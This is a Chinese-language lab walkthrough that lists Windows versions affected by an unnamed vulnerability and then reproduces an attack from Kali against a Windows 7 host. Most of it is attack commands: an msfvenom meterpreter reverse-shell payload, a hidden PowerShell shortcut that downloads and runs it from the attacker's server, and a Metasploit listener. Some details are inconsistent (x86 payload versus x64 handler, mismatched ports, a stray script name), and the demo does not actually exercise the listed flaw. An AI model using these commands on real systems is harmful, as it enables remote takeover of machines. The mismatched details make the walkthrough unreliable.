一.影响版本
漏洞影响范围:
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
服务器系统
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
二.漏洞利用与复现
攻击机:kali2019.4 ip:192.168.1.192
靶机:windows 7 专业版 ip:192.168.1.182
利用Powershell快捷键进行攻击
生成攻击文件,search.ps1,终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.192 -f psh-reflection>search.ps1
切换到opt目录,然后查看到已生成了search.ps1 的powershell 后门
将生成的search.ps1拷贝到/var/www/html目录下
CD到/var/www/html目录下看到search.ps1存在
启动apache服务
访问web下的http://127.0.0.1/search.ps1,可以直接访问:
在靶机上创建一个powershell远程快捷:
powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.192/search.ps1’);test.ps1”
名称为:powershell.exe
kali下创建监听反弹,并且可以看到成功反弹出靶机的shell:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.192
set LPORT 5555
exploit开始监听
在靶机上运行新建的powershell快捷方式,即可反弹shell,结果如下图所示
然后ipconfig看到靶机的ip是192.168.1.182
测试到此结束
请勿将技术利用在非法的用途上。
出了事情本人一概不负责